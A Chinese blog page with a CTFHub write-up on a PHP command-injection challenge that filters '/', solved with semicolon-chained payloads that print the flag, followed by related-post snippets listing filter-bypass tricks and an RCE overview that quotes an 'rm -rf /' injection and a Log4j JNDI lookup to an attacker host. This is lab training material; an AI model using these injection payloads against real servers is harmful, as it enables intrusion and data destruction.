CTFhub-RCE-过滤目录分隔符 /

最新推荐文章于 2024-07-09 18:05:47 发布
最新推荐文章于 2024-07-09 18:05:47 发布
阅读量425 收藏
点赞数
分类专栏: CTFhub-RCE 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ssss39/article/details/134436298
版权
文章讨论了一段PHP代码,涉及IP地址验证、使用`preg_match`检查IP格式并执行ping命令。脚本还尝试访问目录并读取文件,展示了潜在的安全漏洞和文件操作过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

根据源代码信息可知,过滤掉了/

<?php
$res = FALSE;
if (isset($_GET['ip']) && $_GET['ip']) {
    $ip = $_GET['ip'];
    $m = [];
    if (!preg_match_all("/\//", $ip, $m)) {
        $cmd = "ping -c 4 {$ip}";
        exec($cmd, $res);
    } else {
        $res = $m;
    }
}
?>

1. 查看当前目录 127.00.1;ls

2.

127.0.0.1;cd flag_is_here;ls;cat flag_21082715328454.php

ctfhub{32fc4a6e5efacbcfc917e014}

CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2636
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
CTFHUB-RCE通关记录以及常见的绕过过滤的方法
不想当脚本小子的脚本小子
03-21 2341
先过关,再分析相关的防御源代码 1.过滤cat 然后cat 301472130920273.php然后查看网页源代码即可得到flag 2.过滤cat 根据题目要求过滤了cat 而该服务器Linux系统区分大小写 就无法通过大小写来绕过 本来想使用vi命令替换cat命令也能查看到flag中的内容 但是失败了 最后用了替换法:127.0.0.0 ; $a=ca;$b=t; $a$b flagxxxx 题目源码: <?php $res = FALSE; if (is.
CTFHub_技能树_Web之RCE——“过滤目录分隔符
Ho1aAs‘s Blog
07-28 1425
文章目录使用工具解题过程完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 解题过程 127.0.0.1&ls查看当前目录结构 flag需要跳转到子文件夹里 而目录分隔符斜杠被过滤了 因此我们使用cd进入子文件夹,而不是直接cat访问 输入127.0.0.1;cd flag_is_here;ls进入子文件夹并查询,使用分号间隔 127.0.0.1;cd flag_is_here;cat flag_xxx.php访问得到FLAG,位
CTFHub | 过滤目录分隔符
尼泊罗河伯的博客
07-21 1725
检查网页源代码发现这题如果有 / , \ , \\ 就不会执行,说明这题对斜杠做了过滤处理。这里使用 HackBar 进行测试,在 URL 后输入 /ip=127.0.0.1 对本地进行 ping 命令测试,发现可以正常回显。
CTFHUB web-rce-过滤
2301_79783285的博客
12-18 833
回车键,即键盘上的ENTER键,是一个比较有用的键,在文字编辑时,回车键的作用是换行,在输入网址时回车键的作用是“转到”,在执行DOS命令时,回车键的作用是执行。
CTFHub技能书解题笔记-RCE-过滤空格、过滤目录分隔符过滤运算符
qq_43006864的博客
04-01 4882
一、过滤空格 过滤了空格。 引入绕过空格过滤的字符:< 、<>、%20(space)、%09(tab)、$IFS$9、 ${IFS}、$IFS等 直接开始解题 这里就用<来绕过。flag还是再界面源码。 二、过滤目录分隔符 题目提示,这次过滤目录分割符 / ,你能读到 flag 目录下的 flag 文件吗。 这里的话就更简单了,我们可以使用;和cd到目录然后使用cat抓取。也就是用;进行命令拼接。例如:x.x.x.x;cd ../;ls;cat xxx
CTFHub | 综合过滤练习
尼泊罗河伯的博客
09-11 697
检查网页源代码发现这次网页对 | 、&& 、 || 、 \ 、 / 、; ,都进行了过滤处理。在之前的文章有对一些常见的 URL 绕过字符使用方法做一个简单的总结。这里先输入本地 IP 进行 ping 命令测试,发现可以正常回显。
CTFHUB-web-RCE
ookami6497的博客
12-03 1676
CTFHub技能树 Web-RCE 详解
weixin_45808483的博客
11-13 2512
RCE简介: 初学RCE(远程命令/代码执行漏洞)https://blog.youkuaiyun.com/qq_43814486/article/details/90020139 eval执行 启动环境 分析代码,提示我们将命令赋值给cmd执行 我们先查看当前位置的文件,没有什么用 /?cmd=system("ls"); 我们查看根目录文件,发现一个 flag_8999 文件 /?cmd=system("ls /"); 我们先尝试使用cat 命令查看 flag_8999文件 /..
CTFHUB-WEB-RCE【08】命令注入
(∪.∪ )...zzz的博客
06-10 259
????命令注入源代码用IP传入IP&ls 查看文件IP&cat 查看内容过滤cat使用`\` `''` `""` `{任意无意义变量名}`等方法均可绕过过滤空格`$IFS` `$IFS$9` 重定向符`<`过滤目录分隔符; && 执行多条命令过滤运算符;综合过滤练习%0a 命令注入 源代码用IP传入 IP&ls 查看文件 1.1.1.1&ls IP&cat 查看内容 1.1.1.1&cat 7096156205265.php 过
CTFHub(web RCE
2301_81105268的博客
04-04 1354
(remote command/code execute ,远程命令执行)命令执行一般发生在远程,故被称为远程命令执行。分为远程命令执行ping和远程代码执行evel。
命令执行(RCE)面对各种过滤,骚姿势绕过总结
HUANGXIN9898的博客
07-09 2747
RCE又称远程代码执行漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
命令注入————ctfhub过滤cat、空格、目录分隔符、运算符、综合过滤练习)
热门推荐
qq_45655564的博客
05-30 1万+
CTFHub 命令注入-过滤cat <?php $res = FALSE; if (isset($_GET['ip']) && $_GET['ip']) { $ip = $_GET['ip']; $m = []; if (!preg_match_all("/cat/", $ip, $m)) { $cmd = "ping -c 4 {$ip}"; exec($cmd, $res); } else { $r
CTFHub命令注入过滤目录分隔符
manerzi的博客
10-26 838
CTFHub命令注入过滤目录分隔符
ctf笔记
qq_51796436的博客
10-24 467
文件上传黑名单过滤ph或者白名单图片则只能寻求配置文件,如.htaccess和.user,ini。
CTF命令执行小总结
n00bk1ng的博客
05-18 1922
文章目录简介命令执行常见命令及解释执行常见系统命令函数绕过姿势绕过总结函数套娃特殊题无字母无数字命令执行通过文件包含、文件上传拿shell进行命令执行FFI类型题例题ctfshow web31ctfshow web124 简介 命令执行 命令执行:攻击者可以通过web应用执行系统命令,从而获取敏感信息,甚至拿到shell权限等等,造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行。 常见命令及解释 执行常见系统命令 常见的系统命令可以进行命令执行: awk 格式:awk'{printf
CTFHubRCE
遇事不决冲冲冲
04-17 1562
应用有时需要调用一些执行系统命令的函数,当服务器没有经过严格过滤用户的参数,这时候就可能导致命令执行,从而导致命令执行漏洞 常用命令执行函数 system():  该函数会把执行结果输出。 passthru():  该函数只调用命令,并把运行结果原样地直接输出没有返回值 exec():  不输出结果,返回执行结果地最后一行 shell_exec():  不输出结果,返回执行结果 eval执行 源代码就在脸上 <?php if (isset($_REQUEST['cmd'])) { eva
命令执行漏洞 | iwebsec
weixin_52116519的博客
02-26 3035
应用程序有时需要调用一些执行系统命令的函数,如在PHP中,使用system、exec、shell_exec、passthru、popen、proc_popen等函数执行系统命令。当黑客能控制这些函数中的参数时,就可以将恶意的系统命令拼接到正常的命令中,从而造成命令执行攻击,这就是命令执行漏洞。【摘自《web安全攻防》】管道符作用举例直接执行后面的命令。||前面执行的命令执行出错才执行后面的语句。前面的语句无论真假都可以执行后面的语句。(无条件执行后面的语句,推荐使用。&&
CTFhub-RCE-过滤运算符
ssss39的博客
11-17 244
检查网页源代码发现如果用户输入 || (逻辑或操作符) 或者是 && (逻辑与操作符),就不会执行。检查网页源代码发现如果用户输入 || (逻辑或操作符) 或者是 && (逻辑与操作符),就不会执行。过滤运算符指的是在处理输入数据或用户提交的数据时,对特殊字符或可能导致安全问题的内容进行过滤或转义。过滤条件:根据题目代码使用逻辑或执行多行命令时,注意, URL 中的 分号 可以执行多行命令。逻辑或操作符 || %7c%7c 通过URL中的逻辑或操作符来执行XSS攻击或SQL注入攻击。
RCE漏洞
最新发布
03-17
<think>嗯,用户想了解RCE漏洞的定义、利用方式和防御方法。首先,我需要确认RCE的全称是远程命令/代码执行,对吧?根据引用[2],RCE漏洞允许攻击者远程执行命令或代码,控制目标系统。接下来,定义部分应该包括漏洞的基本概念和危害,比如导致数据泄露或系统被控制。 然后是漏洞的利用方式,用户可能想知道攻击者如何发起攻击。引用[3]提到漏洞分类,包括代码层过滤不严、系统漏洞和第三方组件问题。比如,用户输入未经过滤直接拼接系统命令,或者使用危险的函数如eval(),如引用[4]的例子中的eval函数执行PHP代码。攻击者可能通过构造恶意输入,比如在参数中插入命令,像; ls这样的命令,导致服务器执行。 防御方法方面,引用[1]和[3]都提到了输入过滤、白名单机制和最小权限原则。需要具体说明如何对用户输入进行严格的验证,避免直接拼接命令,使用安全的函数替代eval,还有定期更新第三方组件。另外,禁用危险函数和设置权限限制也很重要,比如Web应用不应该有root权限。 用户可能还想知道实际案例,比如引用[4]中的rce_eval.php路径,展示了一个可能存在漏洞的实例。这样用户能更直观地理解漏洞的产生和利用方式。 生成相关问题的时候,需要覆盖漏洞原理、常见场景、与命令注入的区别、真实案例和修复措施。这样用户可以从不同角度深入了解RCE漏洞。 最后,确保回答结构清晰,分点说明定义、利用和防御,每个部分结合引用内容,自然添加引用标识。避免使用复杂术语,保持语言简洁明了,帮助用户逐步理解RCE漏洞的相关知识。</think>### RCE漏洞详解 #### 一、定义 RCE(远程命令/代码执行)漏洞是指攻击者通过网络远程向目标系统注入恶意命令或代码,并直接获得执行权限的安全漏洞。这类漏洞可能导致系统被完全控制、数据泄露或服务中断[^2]。例如: $$ \text{漏洞触发条件} = \text{未过滤的用户输入} + \text{危险函数调用} $$ #### 二、利用方式 1. **代码注入** 通过用户输入直接拼接系统命令(如`ping 127.0.0.1; rm -rf /`),利用PHP的`system()`或Python的`os.popen()`等函数执行。 2. **反序列化攻击** 攻击者构造恶意序列化数据,触发目标系统反序列化时代码执行(如Java的`ObjectInputStream`)。 3. **模板引擎漏洞** 在Jinja2、Freemarker等模板中注入表达式(如`${"".getClass().forName("Runtime").exec("calc")}`)。 4. **第三方组件漏洞** 如Log4j2的`${jndi:ldap://attacker.com/exp}`表达式远程加载恶意类[^3]。 #### 三、防御方法 1. **输入过滤** 使用正则表达式严格限制输入格式,例如: ```python import re if not re.match(r'^[a-zA-Z0-9_-]+$', user_input): raise ValueError("非法输入") ``` 2. **执行隔离** 在Docker容器或沙箱环境中运行高危操作,限制系统权限: ```bash docker run --read-only --memory=100M app ``` 3. **禁用危险函数** 修改PHP配置关闭高危函数: ```ini disable_functions = exec,passthru,shell_exec,system ``` 4. **最小权限原则** 为应用程序分配独立低权限账户: ```bash useradd -r -s /sbin/nologin appuser ``` 5. **组件更新** 定期升级依赖库,如Apache Struts、Spring Framework等[^1]。 #### 四、真实案例 某CMS系统因未过滤`eval($_GET['cmd'])`导致攻击者可通过`http://example.com/rce_eval.php?cmd=system('id')`执行任意命令[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

斜躺青年

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值